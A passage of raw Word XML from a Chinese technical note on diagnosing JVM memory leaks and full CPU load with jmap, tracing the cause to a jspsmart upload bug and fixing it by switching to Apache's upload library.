          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>确定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中具体有哪些生存的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为了确定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中具体有哪些生存的对象，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> jmap(Memory Map)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用于监控系统内存中存活的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="005D381D" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: jmap -histo:live 5125&gt;&gt; /opt/jmap.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4555794" cy="2510932"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="图片 21" descr="&lt;5&g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lt;5&gt;"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4558993" cy="2512695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>问题解决</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="005D381D" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jspsmart</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>由于自身</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，在长时间运行后会产生两个严重问题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="005D381D" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>客户端在未完成上传时便主动终止了上传操作，此时客户端不再上传文件，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>服务端仍然会占用</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，并且不会主动释放，造成</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>占用率</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，猜测</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>证实</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="005D381D" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>客户上传的文件损坏，在创建</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象时无法找到文件终止标识，因此一直在创建新的</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象，造成内存泄漏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="005D381D" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00C11C87" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>由此，服务器内存溢出和</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>占用率</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>两个问题都找到了关键所在，接下来的工作就像对简单了，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的开源项目</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>commons-upload</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>替换原来的</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jspsmart</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来完成文件上传的工作，替换过后，系统资源占用正常，附上</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>修复后的</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jmap</w:t>
      </w:r>
      <w:r w:rsidRPr="005D381D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>截图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:r w:rsidRPr="00C11C87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidRPr="00ED69DD">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/liou825/article/details/19307051</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C972B2" w:rsidRDefault="00C972B2" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C972B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/liou825/article/details/22713725</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存泄漏实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00DA54D7" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r w:rsidR="004D6E5F" w:rsidRPr="00881F00">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://my.oschina.net/shipley/blog/520062</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004D6E5F" w:rsidRDefault="004D6E5F" w:rsidP="00727810">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAT</w:t>
      </w:r>
      <w:r w:rsidR="00727810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00727810">
        <w:t>Memory Analyzer Tool</w:t>
      </w:r>
      <w:r w:rsidR="00727810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存分析工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4302" w:rsidRPr="006F4302" w:rsidRDefault="00D30A31" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4302">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006F4302" w:rsidRPr="006F4302">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006F4302" w:rsidRPr="006F4302">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、整体情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006434DD" w:rsidRDefault="006F4302" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
